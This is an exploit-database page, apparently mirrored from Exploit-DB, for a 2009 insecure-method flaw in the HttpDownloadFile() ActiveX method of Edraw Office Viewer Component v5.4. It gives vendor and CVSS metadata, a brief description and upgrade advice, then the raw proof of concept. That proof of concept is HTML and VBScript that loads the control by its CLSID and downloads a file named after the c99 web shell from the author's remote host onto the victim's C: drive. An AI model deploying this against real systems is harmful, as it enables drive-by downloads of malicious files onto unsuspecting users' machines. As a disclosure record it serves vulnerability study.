header-logo
Suggest Exploit
vendor:
Edraw Office Viewer Component
by:
Cyber-Zone
9.3
CVSS
HIGH
Insecure Method
434
CWE
Product Name: Edraw Office Viewer Component
Affected Version From: v5.4
Affected Version To: v5.4
Patch Exists: Yes
Related CWE: N/A
CPE: a:edrawsoft:edraw_office_viewer_component
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Edraw Office Viewer Component v5.4 HttpDownloadFile() Insecure Method

Edraw Office Viewer Component v5.4 is vulnerable to an insecure method vulnerability. An attacker can exploit this vulnerability to download a malicious file from a remote server to the vulnerable system. This vulnerability is due to the HttpDownloadFile() method of the Edraw Office Viewer Component, which allows an attacker to download a file from a remote server to the vulnerable system without any authentication.

Mitigation:

Upgrade to the latest version of Edraw Office Viewer Component.
Source

Exploit-DB raw data:

Edraw Office Viewer Component v5.4 HttpDownloadFile() Insecure Method



Founded By : Cyber-Zone
E-mail     : Paradis_des_fous@hotmail.fr
Home       : WwW.Exploiter5.CoM
GreetZ     : Houssamix , Hussin X , JiKo , StaCk , str0ke , The_5p3ctrum , BayHay , All Mgharba Wahed wahed Oujda 2009







<object classid='clsid:6BA21C22-53A5-463f-BBE8-5CF7FFA0132B' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  On Error Resume Next
    test.HttpDownloadFile "http://exploiter5.com/Cyber-Zone/c99.rar", "c:\Cyber-Zone\c99.rar"
    MsgBox("Done!")
 End Sub
</script>
</span>
</code></pre>

# milw0rm.com [2009-01-14]